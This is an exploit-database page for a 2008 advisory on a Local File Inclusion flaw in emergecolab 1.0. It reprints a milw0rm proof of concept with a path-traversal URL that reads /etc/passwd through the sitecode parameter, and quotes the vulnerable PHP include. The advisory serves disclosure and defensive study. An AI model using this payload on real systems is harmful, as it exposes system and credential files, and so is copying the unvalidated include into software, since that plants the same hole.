header-logo
Suggest Exploit
vendor:
emergecolab
by:
dun
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: emergecolab
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:emergecolab:emergecolab:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

emergecolab 1.0 Local File Inclusion Vulnerability

A Local File Inclusion vulnerability exists in emergecolab 1.0 due to improper validation of user-supplied input. An attacker can exploit this vulnerability to include arbitrary files from the web server, which may lead to the disclosure of sensitive information or the execution of arbitrary code.

Mitigation:

Upgrade to the latest version of emergecolab 1.0 or apply the patch from the vendor.
Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ###############################################################
 #  [ emergecolab 1.0 ]   Local File Inclusion Vulnerability   #
 ###############################################################
 #
 # Script site: http://emerge2004.net/software.php 
 # Download: http://eduforge.org/projects/emergecolab/
 #
 # Vuln:
 # http://site.com/emerge-1.0/connect/index.php?sitecode=../../../../../../../etc/passwd%00
 #      
 #
 # Bug: ./emerge-1.0/connect/init.inc (lines: 23-30)
 #
 # ...
 # if (isset($_GET["sitecode"])) {
 # 	#first load the global settings
 #	include ("conf/global.conf");
 #	#echo "got get var";
 #	$_SESSION["sitecode"]=$_GET["sitecode"];
 #	#set the session variable with the site folder for now just to default
 #	$_SESSION['sitefolder']='site';
 #	include ("conf/".strtolower($_GET["sitecode"]).".conf"); 	// LFI
 # ...
 #
 #
 # Bug: (for example) ./emerge-1.0/connect/index.php (line: 2)
 #
 # ...
 # require ("init.inc");
 # ...
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-24]

Navigation

Suggest Exploit

Services By CQR